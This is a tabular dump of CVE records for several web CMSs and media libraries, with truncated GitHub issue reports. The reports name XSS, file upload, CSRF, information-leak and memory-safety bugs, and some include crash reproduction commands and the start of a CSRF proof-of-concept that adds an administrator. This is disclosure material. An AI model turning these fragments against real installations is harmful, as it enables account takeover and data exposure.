"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1835"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:13.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D4CE9B7C-3D2B-4876-B8E3-5EE46628EA5C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/Piwigo/Piwigo/issues/1835 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | Hello, I found Stored XSS in Piwigo version 13.4.0.
**Impact:**
In this way, ordinary users can be promoted to administrator users.
**Here are the complete attack steps:**
1. Register an ordinary user.
... | Piwigo-13.4.0-Stored XSS Vulnerability in User-Agent | https://api.github.com/repos/Piwigo/Piwigo/issues/1835/comments | 0 | 2022-12-21T08:21:08Z | 2022-12-25T10:25:36Z | https://github.com/Piwigo/Piwigo/issues/1835 | 1,505,891,189 | 1,835 |
CVE-2022-48006 | 2023-01-30T22:15:12.463 | An arbitrary file upload vulnerability in taocms v3.0.2 allows attackers to execute arbitrary code via a crafted PHP file. This vulnerability is exploited via manipulation of the upext variable at /include/Model/Upload.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/35"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/taogogo/taocms/issues/35 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | This is the latest 3.0.2 version of taocms.
Organize and utilize steps in two steps:
Step1:
Audit the source code "include/Model/Upload.php", line 33, the filename extension can be controlled by modifying variable "upext":
<img width="1339" alt="image" src="https://user-images.githubusercontent.com/39691787/208... | File upload vulnerability exists by modifying Upload.php configuration in backend. | https://api.github.com/repos/taogogo/taocms/issues/35/comments | 0 | 2022-12-21T08:22:48Z | 2022-12-21T08:22:48Z | https://github.com/taogogo/taocms/issues/35 | 1,505,893,165 | 35 |
CVE-2023-22975 | 2023-02-03T17:15:09.073 | A cross-site scripting (XSS) vulnerability in JFinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email parameter under /front/person/profile.html. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/53"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/jflyfox/jfinal_cms/issues/53 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | ## Summary
There is XSS vulnerability below!
The reason for the vulnerability is that there is no filter on user input. According to the guidelines of CMS, We can create a user, and we can control the user's account number, password and email and so on.....
## Exploition
After, There are many ways to trigger th... | XSS vulnerability exists in jfinal_cms V5.1.0 | https://api.github.com/repos/jflyfox/jfinal_cms/issues/53/comments | 1 | 2022-12-29T15:35:31Z | 2022-12-29T15:35:55Z | https://github.com/jflyfox/jfinal_cms/issues/53 | 1,513,842,062 | 53 |
CVE-2021-36535 | 2023-02-03T18:15:10.653 | Buffer Overflow vulnerability in Cesanta mJS 1.26 allows remote attackers to cause a denial of service via crafted .js file to mjs_set_errorf. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/175"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:1.26:*:*:*:*:*:*:*",
"matchCriteriaId": "25C97820-C80A-41CE-B510-F292D2AF665E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding":... | https://github.com/cesanta/mjs/issues/175 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ### Built:
Jun 30 2021
### Details:
heap-based buffer overflow **mjs.c:7617** in **mjs_set_errorf**
### Command:
./mjs -f Heap_Buffer_Overflow.js
### Result:
==2419050==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000178 at pc 0x55555557f3ed bp 0x7fffffffcf40 sp 0x7fffffffcf30
READ of ... | Heap-based Buffer Overflow Vulnerability | https://api.github.com/repos/cesanta/mjs/issues/175/comments | 4 | 2021-06-30T07:10:17Z | 2021-07-27T07:17:09Z | https://github.com/cesanta/mjs/issues/175 | 933,378,748 | 175 |
CVE-2021-36569 | 2023-02-03T18:15:11.290 | Cross Site Request Forgery vulnerability in FUEL-CMS 1.4.13 allows remote attackers to run arbitrary code via post ID to /users/delete/2. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/578"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.13:*:*:*:*:*:*:*",
"matchCriteriaId": "22D4ECFB-0516-4086-83DA-AA5F1EE17D26",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/daylightstudio/FUEL-CMS/issues/578 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | Hi:
FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability that can delete a user account via a post ID to /users/delete/2

POC:
 vulnerability | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/578/comments | 0 | 2021-07-02T02:26:46Z | 2021-08-10T17:49:19Z | https://github.com/daylightstudio/FUEL-CMS/issues/578 | 935,354,402 | 578 |
CVE-2021-36570 | 2023-02-03T18:15:11.393 | Cross Site Request Forgery vulnerability in FUEL-CMS 1.4.13 allows remote attackers to run arbitrary code via post ID to /permissions/delete/2---. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/579"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.13:*:*:*:*:*:*:*",
"matchCriteriaId": "22D4ECFB-0516-4086-83DA-AA5F1EE17D26",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/daylightstudio/FUEL-CMS/issues/579 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability that can delete a Permission via a post ID to /permissions/delete/2

POC:
 vulnerability | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/579/comments | 0 | 2021-07-02T02:35:59Z | 2021-07-03T01:33:05Z | https://github.com/daylightstudio/FUEL-CMS/issues/579 | 935,357,769 | 579 |
CVE-2021-37304 | 2023-02-03T18:15:11.770 | An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/2793"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAC1F1CC-39F3-4B9F-A810-FE74D5E636F2",
"versionEndExcluding": null,
"versionEndIncluding": "2.4.5",
"versionStartExcluding":... | https://github.com/jeecgboot/jeecg-boot/issues/2793 | [
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:
2.4.5

##### 问题描述:
Unauthorized access to the httptrace interface reveals sensitive information such as user cookies
##### 截图&代码:
api interface
http://Ip:8080/jeecg-boot/actuator/httptra... | [security issue] The jeecg-boot version is less than or equal to 2.4.5 httptrace interface has unauthorized access and leaks sensitive information such as user cookies | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/2793/comments | 1 | 2021-07-15T08:12:15Z | 2021-07-15T10:06:18Z | https://github.com/jeecgboot/JeecgBoot/issues/2793 | 945,118,917 | 2,793 |
CVE-2021-37305 | 2023-02-03T18:15:11.890 | An Insecure Permissions issue in jeecg-boot 2.4.5 and earlier allows remote attackers to gain escalated privilege and view sensitive information via api uri: /sys/user/querySysUser?username=admin. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/2794"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAC1F1CC-39F3-4B9F-A810-FE74D5E636F2",
"versionEndExcluding": null,
"versionEndIncluding": "2.4.5",
"versionStartExcluding":... | https://github.com/jeecgboot/jeecg-boot/issues/2794 | [
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:
<=2.4.5
##### 问题描述:
###### 1. leaks sensitive information api uri: /sys/user/querySysUser?username=admin

leaks sensitive information such as phone .etc
###### 2. Enumerate usernames api ur... | [2 secueiry issue]jeecg-boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/2794/comments | 1 | 2021-07-15T08:32:21Z | 2021-08-05T07:02:44Z | https://github.com/jeecgboot/JeecgBoot/issues/2794 | 945,135,797 | 2,794 |
CVE-2022-45755 | 2023-02-08T19:15:11.600 | Cross-site scripting (XSS) vulnerability in EyouCMS v1.6.0 allows attackers to execute arbitrary code via the home page description on the basic information page. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/39"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EB987CAE-6D4D-417A-8E0D-9DCC47F986EB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/39 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | Version:V1.6.0-UTF8-SP1

1. Go to the background --> basic information--> home page description

... | Vulnerability: EyouCMS v1.6.0 has a vulnerability that stores cross-site scripting (XSS) | https://api.github.com/repos/weng-xianhu/eyoucms/issues/39/comments | 1 | 2022-11-19T06:37:02Z | 2023-02-20T08:21:46Z | https://github.com/weng-xianhu/eyoucms/issues/39 | 1,456,264,360 | 39 |
CVE-2023-0841 | 2023-02-15T14:15:13.283 | A vulnerability, which was classified as critical, has been found in GPAC 2.3-DEV-rev40-g3602a5ded. This issue affects the function mp3_dmx_process of the file filters/reframe_mp3.c. The manipulation leads to heap-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cna@vuldb.com",
"tags": null,
"url": "https://github.com/advisories/GHSA-w52x-cp47-xhhw"
},
{
"source": "cna@vuldb.com",
"tags": null,
"url": "https://github.com/gpac/gpac/commit/851560e3dc8155d45ace4b0d77421f241ed71dc4"
},
{
"source": "cna@vuldb.com",
"tags": nu... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev40-g3602a5ded:*:*:*:*:*:*:*",
"matchCriteriaId": "BF8AB1FE-492D-4281-B779-FD501A50998C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versi... | https://github.com/gpac/gpac/issues/2396 | null | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough info... | heap-buffer-overflow in function mp3_dmx_process filters/reframe_mp3.c:677 | https://api.github.com/repos/gpac/gpac/issues/2396/comments | 1 | 2023-02-09T14:19:15Z | 2023-02-13T16:32:29Z | https://github.com/gpac/gpac/issues/2396 | 1,577,978,840 | 2,396 |
CVE-2022-46440 | 2023-02-24T02:15:10.377 | ttftool v0.9.2 was discovered to contain a segmentation violation via the readU16 function at ttf.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/keepinggg/poc"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/matthias... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/matthiaskramm/swftools/issues/194 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | # SEGV
## env
ubuntu20.04
gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)
ttftool - part of swftools 0.9.2
## sample
[poc.zip](https://github.com/matthiaskramm/swftools/files/10101243/poc.zip)
## crash
```
./ttftool poc1
AddressSanitizer:DEADLYSIGNAL
===================================================... | The function readU16 in ttf.c appears SEGV | https://api.github.com/repos/swftools/swftools/issues/194/comments | 0 | 2022-11-28T07:04:36Z | 2022-11-28T07:04:36Z | https://github.com/swftools/swftools/issues/194 | 1,465,918,774 | 194 |
CVE-2021-34167 | 2023-02-24T21:15:10.627 | Cross Site Request Forgery (CSRF) vulnerability in taoCMS 3.0.2 allows remote attackers to gain escalated privileges via taocms/admin/admin.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/taogogo/taocms/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | After the administrator logged in, when he opened following malicious pages, CSRF(Cross Site Request Forgery) vulnerabilities occurred.
**poc:**
**one.html—add a new account which has administrator privileges**
```html
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document... | There are two CSRF vulnerabilities that can add administrator account and change administrator password | https://api.github.com/repos/taogogo/taocms/issues/6/comments | 1 | 2021-05-30T17:59:11Z | 2021-07-29T13:55:44Z | https://github.com/taogogo/taocms/issues/6 | 906,833,744 | 6 |
CVE-2023-24751 | 2023-03-01T15:15:11.393 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the mc_chroma function at motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/strukturag/libde265/issues/379"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debia... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/strukturag/libde265/issues/379 | [
"Exploit",
"Patch",
"Vendor Advisory"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function mc_chroma at motion.cc:244
# Version
```
git log
commit 1cf2999583ef8a90e11933ed70908e4e2c2d8872 (HEAD -> master, origin/master, origin/HEAD)
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen... | NULL Pointer Dereference in function mc_chroma at motion.cc:244 | https://api.github.com/repos/strukturag/libde265/issues/379/comments | 2 | 2023-01-28T03:15:32Z | 2023-03-04T07:38:40Z | https://github.com/strukturag/libde265/issues/379 | 1,560,664,401 | 379 |
CVE-2023-24752 | 2023-03-01T15:15:11.447 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_hevc_epel_pixels_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/378"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/strukturag/libde265/issues/378 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_hevc_epel_pixels_8_sse at sse-motion.cc:987
# Version
```
git log
commit 1cf2999583ef8a90e11933ed70908e4e2c2d8872 (HEAD -> master, origin/master, origin/HEAD)
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde26... | NULL Pointer Dereference in function ff_hevc_put_hevc_epel_pixels_8_sse at sse-motion.cc:987 | https://api.github.com/repos/strukturag/libde265/issues/378/comments | 2 | 2023-01-28T02:54:24Z | 2023-03-04T07:39:03Z | https://github.com/strukturag/libde265/issues/378 | 1,560,655,877 | 378 |
CVE-2023-24754 | 2023-03-01T15:15:11.510 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_weighted_pred_avg_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/382"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/strukturag/libde265/issues/382 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:237
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sat Jan 28 15:03:34 2023 +0100
... | NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:237 | https://api.github.com/repos/strukturag/libde265/issues/382/comments | 2 | 2023-01-29T08:14:34Z | 2023-03-04T07:40:02Z | https://github.com/strukturag/libde265/issues/382 | 1,561,180,454 | 382 |
CVE-2023-24755 | 2023-03-01T15:15:11.577 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the put_weighted_pred_8_fallback function at fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/384"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/strukturag/libde265/issues/384 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function put_weighted_pred_8_fallback at fallback-motion.cc:69
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sat Jan 28 15:03:34 2023 +0100
``... | NULL Pointer Dereference in function put_weighted_pred_8_fallback at fallback-motion.cc:69 | https://api.github.com/repos/strukturag/libde265/issues/384/comments | 2 | 2023-01-29T08:15:40Z | 2023-03-04T07:40:24Z | https://github.com/strukturag/libde265/issues/384 | 1,561,180,905 | 384 |
CVE-2023-24756 | 2023-03-01T15:15:11.623 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_unweighted_pred_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/380"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/strukturag/libde265/issues/380 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_unweighted_pred_8_sse at sse-motion.cc:116
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sat Jan 28 15:03:34 2023 +0100
`... | NULL Pointer Dereference in function ff_hevc_put_unweighted_pred_8_sse at sse-motion.cc:116 | https://api.github.com/repos/strukturag/libde265/issues/380/comments | 1 | 2023-01-29T08:12:53Z | 2023-03-04T07:41:52Z | https://github.com/strukturag/libde265/issues/380 | 1,561,180,071 | 380 |
CVE-2023-24757 | 2023-03-01T15:15:11.683 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the put_unweighted_pred_16_fallback function at fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/385"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/strukturag/libde265/issues/385 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function put_unweighted_pred_16_fallback at fallback-motion.cc:179
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sat Jan 28 15:03:34 2023 +0100
... | NULL Pointer Dereference in function put_unweighted_pred_16_fallback at fallback-motion.cc:179 | https://api.github.com/repos/strukturag/libde265/issues/385/comments | 2 | 2023-01-29T08:16:20Z | 2023-03-04T07:42:01Z | https://github.com/strukturag/libde265/issues/385 | 1,561,181,036 | 385 |
CVE-2023-24758 | 2023-03-01T15:15:11.743 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_weighted_pred_avg_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
